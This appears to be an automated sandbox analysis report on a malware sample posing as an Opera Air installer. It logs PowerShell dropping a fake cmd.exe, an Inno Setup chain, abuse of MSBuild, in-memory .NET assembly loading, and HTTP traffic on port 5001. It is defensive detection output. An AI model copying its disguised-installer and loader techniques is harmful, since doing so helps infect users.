Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\System32\notepad.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: DIFXAPI.pdb source: is-JNHPI.tmp.10.dr
Source:	Binary string: D:\a\1\SourceDirWith49CharsLengthTestForLongPaths\artifacts\obj\Microsoft.Azure.Management.ResourceManager\Debug\net461\Microsoft.Azure.Management.ResourceManager.pdbSHA256 source: is-40U72.tmp.10.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: OperaAirSetup.exe, 0000000C.00000002.2868710892.000000000480C000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2872199947.0000000006050000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004371000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\SourceDirWith49CharsLengthTestForLongPaths\artifacts\obj\Microsoft.Azure.Management.ResourceManager\Debug\net461\Microsoft.Azure.Management.ResourceManager.pdb source: is-40U72.tmp.10.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: OperaAirSetup.exe, 0000000C.00000002.2868710892.000000000480C000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2872199947.0000000006050000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004371000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxProxyStub\VBoxProxyStub.pdb source: is-SBTFQ.tmp.10.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: cmd.tmp, 00000008.00000003.2359613822.0000000002189000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.10.dr, cmd.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 12.2.OperaAirSetup.exe.29b243e.1.raw.unpack, Sivhfdf.cs	.Net Code: Spqgn System.AppDomain.Load(byte[])
Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 12.2.OperaAirSetup.exe.59c0000.9.raw.unpack, Sivhfdf.cs	.Net Code: Spqgn System.AppDomain.Load(byte[])
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 12.3.OperaAirSetup.exe.4a11aa7.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.OperaAirSetup.exe.4a11aa7.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OperaAirSetup.exe.5ca0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OperaAirSetup.exe.5ca0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.OperaAirSetup.exe.49d1a87.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2871226896.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2849424911.00000000049C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OperaAirSetup.exe PID: 5712, type: MEMORYSTR

Source: is-40U72.tmp.10.dr

Static PE information: 0xEFE7255A [Wed Jul 17 12:36:42 2097 UTC]

Source: is-JNHPI.tmp.10.dr	Static PE information: section name: .srdata
Source: is-SBTFQ.tmp.10.dr	Static PE information: section name: .orpc
Source: is-IS7LO.tmp.10.dr	Static PE information: section name: .fptable

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_04E32CA5 pushad ; iretd	0_2_04E32CD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_04E334BF push esp; iretd	0_2_04E334D1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_04E3D2A0 push eax; mov dword ptr [esp], edx	0_2_04E3D2B4
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EBA338 push ecx; ret	12_2_00EBA34D
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EB9C74 push ecx; ret	12_2_00EB9C87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00447940 push eax; mov dword ptr [esp], BAB5B4C7h	13_2_00447943
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044E95C pushfd ; iretd	13_2_0044E975
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044F3B8 pushad ; iretd	13_2_0044F3B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044DE6C pushad ; ret	13_2_0044DE6F

Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\bassenc_ogg.dll (copy)	Jump to dropped file
Source: C:\Windows\Temp\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-JNHPI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-UDKGG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-IS7LO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\VBoxProxyStub.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-JLLE4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\difxapi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\Microsoft.Azure.Management.ResourceManager.dll (copy)	Jump to dropped file
Source: C:\Windows\Temp\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\cmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-40U72.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-SBTFQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	File created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\7za.dll (copy)	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\cmd.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 5001
Source: unknown	Network traffic detected: HTTP traffic on port 5001 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 5001
Source: unknown	Network traffic detected: HTTP traffic on port 5001 -> 49813

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
